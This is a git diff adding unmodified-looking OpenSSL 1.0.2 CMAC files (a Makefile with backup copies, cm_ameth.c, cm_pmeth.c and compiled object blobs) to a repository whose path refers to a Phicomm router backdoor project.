+LIBOBJ=cmac.o cm_ameth.o cm_pmeth.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= cmac.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cm_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+cm_ameth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cm_ameth.o: ../../include/openssl/cmac.h ../../include/openssl/crypto.h
+cm_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cm_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cm_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cm_ameth.o: ../../include/openssl/opensslconf.h
+cm_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cm_ameth.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cm_ameth.o: ../../include/openssl/symhacks.h ../asn1/asn1_locl.h ../cryptlib.h
+cm_ameth.o: cm_ameth.c
+cm_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+cm_pmeth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cm_pmeth.o: ../../include/openssl/cmac.h ../../include/openssl/conf.h
+cm_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cm_pmeth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cm_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cm_pmeth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cm_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cm_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cm_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cm_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cm_pmeth.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cm_pmeth.o: ../cryptlib.h ../evp/evp_locl.h cm_pmeth.c
+cmac.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+cmac.o: ../../include/openssl/buffer.h ../../include/openssl/cmac.h
+cmac.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cmac.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cmac.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cmac.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cmac.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cmac.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cmac.o: ../../include/openssl/symhacks.h ../cryptlib.h cmac.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/Makefile.bak
new file mode 100644
index 0000000..7f15840
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/Makefile.bak
@@ -0,0 +1,109 @@
+#
+# OpenSSL/crypto/cmac/Makefile
+#
+
+DIR=	cmac
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=cmac.c cm_ameth.c cm_pmeth.c
+LIBOBJ=cmac.o cm_ameth.o cm_pmeth.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= cmac.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cm_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+cm_ameth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cm_ameth.o: ../../include/openssl/cmac.h ../../include/openssl/crypto.h
+cm_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cm_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cm_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cm_ameth.o: ../../include/openssl/opensslconf.h
+cm_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cm_ameth.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cm_ameth.o: ../../include/openssl/symhacks.h ../asn1/asn1_locl.h ../cryptlib.h
+cm_ameth.o: cm_ameth.c
+cm_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+cm_pmeth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cm_pmeth.o: ../../include/openssl/cmac.h ../../include/openssl/conf.h
+cm_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cm_pmeth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cm_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cm_pmeth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cm_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cm_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cm_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cm_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cm_pmeth.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cm_pmeth.o: ../cryptlib.h ../evp/evp_locl.h cm_pmeth.c
+cmac.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+cmac.o: ../../include/openssl/buffer.h ../../include/openssl/cmac.h
+cmac.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cmac.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cmac.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cmac.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cmac.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cmac.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cmac.o: ../../include/openssl/symhacks.h ../cryptlib.h cmac.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/Makefile.save
new file mode 100644
index 0000000..7f15840
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/Makefile.save
@@ -0,0 +1,109 @@
+#
+# OpenSSL/crypto/cmac/Makefile
+#
+
+DIR=	cmac
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=cmac.c cm_ameth.c cm_pmeth.c
+LIBOBJ=cmac.o cm_ameth.o cm_pmeth.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= cmac.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cm_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+cm_ameth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cm_ameth.o: ../../include/openssl/cmac.h ../../include/openssl/crypto.h
+cm_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+cm_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+cm_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+cm_ameth.o: ../../include/openssl/opensslconf.h
+cm_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cm_ameth.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cm_ameth.o: ../../include/openssl/symhacks.h ../asn1/asn1_locl.h ../cryptlib.h
+cm_ameth.o: cm_ameth.c
+cm_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+cm_pmeth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+cm_pmeth.o: ../../include/openssl/cmac.h ../../include/openssl/conf.h
+cm_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cm_pmeth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cm_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cm_pmeth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cm_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cm_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+cm_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+cm_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+cm_pmeth.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+cm_pmeth.o: ../cryptlib.h ../evp/evp_locl.h cm_pmeth.c
+cmac.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+cmac.o: ../../include/openssl/buffer.h ../../include/openssl/cmac.h
+cmac.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cmac.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+cmac.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+cmac.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+cmac.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cmac.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cmac.o: ../../include/openssl/symhacks.h ../cryptlib.h cmac.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_ameth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_ameth.c
new file mode 100644
index 0000000..bf933e0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_ameth.c
@@ -0,0 +1,96 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2010.
+ */
+/* ====================================================================
+ * Copyright (c) 2010 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/cmac.h>
+#include "asn1_locl.h"
+
+/*
+ * CMAC "ASN1" method. This is just here to indicate the maximum CMAC output
+ * length and to free up a CMAC key.
+ */
+
+static int cmac_size(const EVP_PKEY *pkey)
+{
+    return EVP_MAX_BLOCK_LENGTH;
+}
+
+static void cmac_key_free(EVP_PKEY *pkey)
+{
+    CMAC_CTX *cmctx = (CMAC_CTX *)pkey->pkey.ptr;
+    if (cmctx)
+        CMAC_CTX_free(cmctx);
+}
+
+const EVP_PKEY_ASN1_METHOD cmac_asn1_meth = {
+    EVP_PKEY_CMAC,
+    EVP_PKEY_CMAC,
+    0,
+
+    "CMAC",
+    "OpenSSL CMAC method",
+
+    0, 0, 0, 0,
+
+    0, 0, 0,
+
+    cmac_size,
+    0,
+    0, 0, 0, 0, 0, 0, 0,
+
+    cmac_key_free,
+    0,
+    0, 0
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_ameth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_ameth.o
new file mode 100644
index 0000000000000000000000000000000000000000..49b4311a6ba2186c993d65febefa4ef89e5682ad
GIT binary patch
literal 2296
zcmds1K~ED=5T3Fis3;JP(V%7z#%Pq67D<d8Ora@osA2>n7qcwODhAqOyG;NS;GhTN
z#l%0r&){gnAK)i=^=P~pV}kST&XmWxT=eE7uQT(#`Q}Y$-rMbRWuhaOBb6LIq$5vJ
zq92_{b}=@K)K7i%z3=+ZJ(q!fSW_Ri-KlqnQP)?5?3W&mm1ue`tj)|+TsUqujF#(5
z*c91vh_L<}nJkq?-CJ{uty<J_ADDY4KUBEiirvE2aNgucZYOZ^kI~kCUR}H<AJ0(-
z(Pv=Vl8bCZa+^;nx89!{?CtLP$O8iBYP>^qMl`Uz*cU{fq%h-7`gWML?_}Np)TC7%
zXE~fHExinMSb4O@OM<I!*XhJvNN2*ir~U*Pap?33xMn}T?a<ldfOrn|{DI$K1pQ3Q
zC<9se6ypO{od-$`s-BNqZvqOce&97<ZH9@p5^i`e8evG@WMz7Mtl~{iOw5#Lz1gwx
zO4%d47q2uspTxvmzga7INJey7@}u+TdHp&}L~Fx*yCnun;}yq!gUlx?o)q7`w(N?9
zc;MPmS8!l<{74Gdcrwk6YUD4njv9$xR;v-N`X&n3BQi^V<da!!Hpw*Va1dTF1$Ge>
zBW&@eS*-{DDw&{Ot%fzG*6LAc_~{HaBR^OX|7ERZ)*AJ-un}!Yj&PYf$)k`$|53Tj
zM{m+Mv&b0aTB6#&h_z*q9n7w1gKY1~6VrK}V+>rqp^D!WJpCe{GoB^s^Y3yHa{ev9
zz+B`U=4FeXf5isb*7H@D1xug5BfR$e5#JT9s>nuG{|+SKf&`*}m{Gcaxc8_f&&!r4
zQs5mMWLxW2?OT`~`bGn6FeCOgV|btT8v<oV_%0kvw0?!&vw_ewe^>ZL4HTW`zhykD
ze|dl`+86W>Urpuf{mVKVyf1RT{ttYckR#2<mpeUshG;>+XK*Z$v~6U7txUeu|EV3B
H7-{}*iV&0r

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_pmeth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_pmeth.c
new file mode 100644
index 0000000..a2300df
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_pmeth.c
@@ -0,0 +1,216 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2010.
+ */
+/* ====================================================================
+ * Copyright (c) 2010 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/evp.h>
+#include <openssl/cmac.h>
+#include "evp_locl.h"
+
+/* The context structure and "key" is simply a CMAC_CTX */
+
+static int pkey_cmac_init(EVP_PKEY_CTX *ctx)
+{
+    ctx->data = CMAC_CTX_new();
+    if (!ctx->data)
+        return 0;
+    ctx->keygen_info_count = 0;
+    return 1;
+}
+
+static int pkey_cmac_copy(EVP_PKEY_CTX *dst, EVP_PKEY_CTX *src)
+{
+    if (!pkey_cmac_init(dst))
+        return 0;
+    if (!CMAC_CTX_copy(dst->data, src->data))
+        return 0;
+    return 1;
+}
+
+static void pkey_cmac_cleanup(EVP_PKEY_CTX *ctx)
+{
+    CMAC_CTX_free(ctx->data);
+}
+
+static int pkey_cmac_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    CMAC_CTX *cmkey = CMAC_CTX_new();
+    CMAC_CTX *cmctx = ctx->data;
+    if (!cmkey)
+        return 0;
+    if (!CMAC_CTX_copy(cmkey, cmctx)) {
+        CMAC_CTX_free(cmkey);
+        return 0;
+    }
+    EVP_PKEY_assign(pkey, EVP_PKEY_CMAC, cmkey);
+
+    return 1;
+}
+
+static int int_update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    if (!CMAC_Update(ctx->pctx->data, data, count))
+        return 0;
+    return 1;
+}
+
+static int cmac_signctx_init(EVP_PKEY_CTX *ctx, EVP_MD_CTX *mctx)
+{
+    EVP_MD_CTX_set_flags(mctx, EVP_MD_CTX_FLAG_NO_INIT);
+    mctx->update = int_update;
+    return 1;
+}
+
+static int cmac_signctx(EVP_PKEY_CTX *ctx, unsigned char *sig, size_t *siglen,
+                        EVP_MD_CTX *mctx)
+{
+    return CMAC_Final(ctx->data, sig, siglen);
+}
+
+static int pkey_cmac_ctrl(EVP_PKEY_CTX *ctx, int type, int p1, void *p2)
+{
+    CMAC_CTX *cmctx = ctx->data;
+    switch (type) {
+
+    case EVP_PKEY_CTRL_SET_MAC_KEY:
+        if (!p2 || p1 < 0)
+            return 0;
+        if (!CMAC_Init(cmctx, p2, p1, NULL, NULL))
+            return 0;
+        break;
+
+    case EVP_PKEY_CTRL_CIPHER:
+        if (!CMAC_Init(cmctx, NULL, 0, p2, ctx->engine))
+            return 0;
+        break;
+
+    case EVP_PKEY_CTRL_MD:
+        if (ctx->pkey && !CMAC_CTX_copy(ctx->data,
+                                        (CMAC_CTX *)ctx->pkey->pkey.ptr))
+            return 0;
+        if (!CMAC_Init(cmctx, NULL, 0, NULL, NULL))
+            return 0;
+        break;
+
+    default:
+        return -2;
+
+    }
+    return 1;
+}
+
+static int pkey_cmac_ctrl_str(EVP_PKEY_CTX *ctx,
+                              const char *type, const char *value)
+{
+    if (!value) {
+        return 0;
+    }
+    if (!strcmp(type, "key")) {
+        void *p = (void *)value;
+        return pkey_cmac_ctrl(ctx, EVP_PKEY_CTRL_SET_MAC_KEY, strlen(p), p);
+    }
+    if (!strcmp(type, "cipher")) {
+        const EVP_CIPHER *c;
+        c = EVP_get_cipherbyname(value);
+        if (!c)
+            return 0;
+        return pkey_cmac_ctrl(ctx, EVP_PKEY_CTRL_CIPHER, -1, (void *)c);
+    }
+    if (!strcmp(type, "hexkey")) {
+        unsigned char *key;
+        int r;
+        long keylen;
+        key = string_to_hex(value, &keylen);
+        if (!key)
+            return 0;
+        r = pkey_cmac_ctrl(ctx, EVP_PKEY_CTRL_SET_MAC_KEY, keylen, key);
+        OPENSSL_free(key);
+        return r;
+    }
+    return -2;
+}
+
+const EVP_PKEY_METHOD cmac_pkey_meth = {
+    EVP_PKEY_CMAC,
+    EVP_PKEY_FLAG_SIGCTX_CUSTOM,
+    pkey_cmac_init,
+    pkey_cmac_copy,
+    pkey_cmac_cleanup,
+
+    0, 0,
+
+    0,
+    pkey_cmac_keygen,
+
+    0, 0,
+
+    0, 0,
+
+    0, 0,
+
+    cmac_signctx_init,
+    cmac_signctx,
+
+    0, 0,
+
+    0, 0,
+
+    0, 0,
+
+    0, 0,
+
+    pkey_cmac_ctrl,
+    pkey_cmac_ctrl_str
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_pmeth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_pmeth.o
new file mode 100644
index 0000000000000000000000000000000000000000..f0ed6bdfae0a4120823306a4c87faf6d6ffdaeb5
GIT binary patch
literal 4784
zcmdUzYitxn9Kfe{S2(n6Paax9@Wg^gfU^e}9wDaJyKA?4&;mW=VYAsT+xDdQ@NO@(
zngHe~$$B;+@sW@iG4YEZjNyYJ#AtH{h@i$m6AXS56Qae__^2Wg@cjR0XWHrZ?u+q@
z|73S&e)E6K{AX@v+ryD)tD~ldaH%0rlBpJ_gq)J5>dmy;OgyBXOw=#^%lsuKn_tR>
zlrMj4mf^|Ysxy|AFP!<iTrTHgr6uz4MZ+~bHslHvORcgt76}vs7fTJ%LYuoJ$%QtL
zJY38zrZg}XxG9@Ik7I!0V*TsI`qRbIJh_nePSM<z(&_HA7*{SF_T4~LZ0wZHiBTN7
zY<@%S<&oNZp-(nLzB4$ZeblBC0(#}bppWY8<w0m4xVTL*j0MeLT*ll_Lo$X4QXgTn
zXt|jdIv9ib|AE$W{znh>&~Ba&6t@olWNeTNSzmN=O1XJZH^Yr}RI31$(!!|u!{{L=
zj?|hsjU?yKdG>V&t%(L>!LAtk-Y*wi%YAfK;YK%%a(FD~js&jX_!wBb`Fp#0R~~r+
z$19sxqUQHB3S@VYoWEEG|D&^@>$msiKQGH8+X37ttz!Cu@^U^9+57}ka5Dc{d9)4;
zaT;~7szLKysRIm{DGdS);;aKx+5C<Y**uTdD+&u5!4Q1W;Nzd)E#pW)pK6t61wX=#
zB110R`{i}k^o&}|1tcMCUh57%%M!u!ynQ?hM&Ny+T*&$4!i&~&^3~kCulwu)eTZoB
zbibY<{rVubDhejvRk7!P3fn@V&0b%uCzmvG-c9~>{-!m74LRBj99rAtZ(6_7!q)t7
